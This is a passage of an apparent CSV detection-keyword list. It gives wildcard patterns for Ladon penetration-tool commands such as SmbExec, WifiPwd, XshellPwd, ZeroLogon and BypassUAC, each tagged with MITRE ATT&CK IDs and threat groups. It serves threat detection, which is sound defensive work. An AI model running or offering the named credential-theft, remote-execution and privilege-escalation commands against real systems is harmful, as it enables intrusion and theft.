loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon sc *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SetSignAuth*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SmbExec *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon Sniffer*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SshExec *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon SweetPotato*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon TcpServer *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon UdpServer*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon WebShell*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon whoami*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon WifiPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon wmiexec*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon WmiExec2 *","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon XshellPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon ZeroLogon*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon40 BypassUAC*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon911*.ps1","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon911.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*Ladon911_*.rar*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*LadonExp.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
